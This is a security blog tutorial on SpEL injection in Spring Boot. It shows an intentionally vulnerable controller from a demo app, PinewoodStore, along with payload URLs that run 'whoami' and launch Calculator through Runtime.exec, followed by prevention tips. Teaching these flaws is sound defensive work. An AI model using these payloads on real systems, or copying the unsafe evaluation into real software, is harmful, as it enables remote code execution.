Home / Spring boot / 💣 SpEL Injection Demo in Spring Boot – Exploiting PinewoodStore

💣 SpEL Injection Demo in Spring Boot – Exploiting PinewoodStore

By
No Comments
April 16, 2025 4:50 am

In today’s post, we’re diving deep into a powerful yet often overlooked vulnerability in Spring Boot apps — SpEL Injection. We’ve baked it right into our intentionally vulnerable PinewoodStore app so we can demonstrate how it works and show how it can even lead to Remote Code Execution (RCE). 🔥

🧬 What is Injection?

Injection is a type of security vulnerability where untrusted input is passed to an interpreter or engine, resulting in unintended commands being executed. Classic examples include:

  • SQL Injection
  • Command Injection
  • SpEL Injection

The common factor? User input is treated like code. And that’s dangerous. 🔓

💡 What is SpEL?

SpEL (Spring Expression Language) is a dynamic expression language used across the Spring Framework for querying and manipulating objects at runtime.

You can use SpEL for:

  • Accessing bean properties: {user.name}
  • Performing logic and math: {1 + 2}
  • Calling static methods: T(java.lang.Math).sqrt(16)

⚠️ What is SpEL Injection?

SpEL Injection happens when user-supplied input is evaluated as a SpEL expression, allowing attackers to execute arbitrary code or access sensitive data.

If an endpoint uses something like SpelExpressionParser and evaluates raw input — it’s game over.

🧪 Vulnerable Code in PinewoodStore: SpellController.java

Here’s the vulnerable endpoint we’ve added for this demo:

package com.enoch.auth2.controller;

import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
@RequestMapping("/info")
public class SpellController {
    
    @GetMapping("/security")
    public String evaluate(@RequestParam String expression) {
        System.out.println(expression);
        ExpressionParser parser = new SpelExpressionParser();
        Expression exp = parser.parseExpression(expression);
        return "Result: " + exp.getValue();  // ⚠️ Vulnerable
    }
}

This code takes a user-supplied expression and evaluates it using SpelExpressionParser, with no filtering, no sanitization, and no limits.

🚨 This is the core of SpEL Injection — and it’s wide open in this controller.

🧪 Live Demo: Exploiting SpEL Injection for RCE

Let’s walk through some test payloads to demonstrate how this flaw can be weaponized.

🔍 Test 1: Fetch OS Info

GET /info/security?expression=T(System).getProperty('os.name')

➡️ Output: "Result: Windows 11" (or your current OS)

👤 Test 2: Find the Current User

GET /info/security?expression=new%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()).next()

➡️ Output: "Result: your-username"

➗ Test 3: Basic Math Evaluation

GET /info/security?expression=100*5

➡️ Output: "Result: 500"

💥 Test 4: Remote Code Execution (RCE) – Windows

GET /info/security?expression=T(java.lang.Runtime).getRuntime().exec('calc')

➡️ This launches Calculator on a Windows machine — classic proof of RCE.

🧠 Key Terms

TermMeaning
SpELSpring Expression Language for evaluating expressions dynamically
InjectionA vulnerability where input is interpreted as code
ExpressionParserSpring class that parses and compiles expressions
parseExpression()Method that converts a string to executable SpEL
exp.getValue()Runs the expression and returns the result

🔐 How to Prevent SpEL Injection

  1. Never pass raw user input to SpelExpressionParser.
  2. Validate or sanitize input if dynamic logic is needed.
  3. ✅ Protect such endpoints with authentication and authorization.
  4. 🔐 Avoid using SpEL altogether in user-facing endpoints unless absolutely necessary.

💬 Final Thoughts

SpEL Injection is real, dangerous, and easy to overlook. With just one line of unsafe evaluation, you give attackers full control of the backend. Our PinewoodStore intentionally leaves this door open to demonstrate how attackers can walk right through it.

🔍 In real-world apps, a tiny misuse like this could compromise entire systems.

We’ll continue adding more attack vectors like this to PinewoodStore to help developers learn how to find, exploit, and fix modern security flaws.

Tagged:
Pinewoodtech

Leave a Reply

Your email address will not be published. Required fields are marked *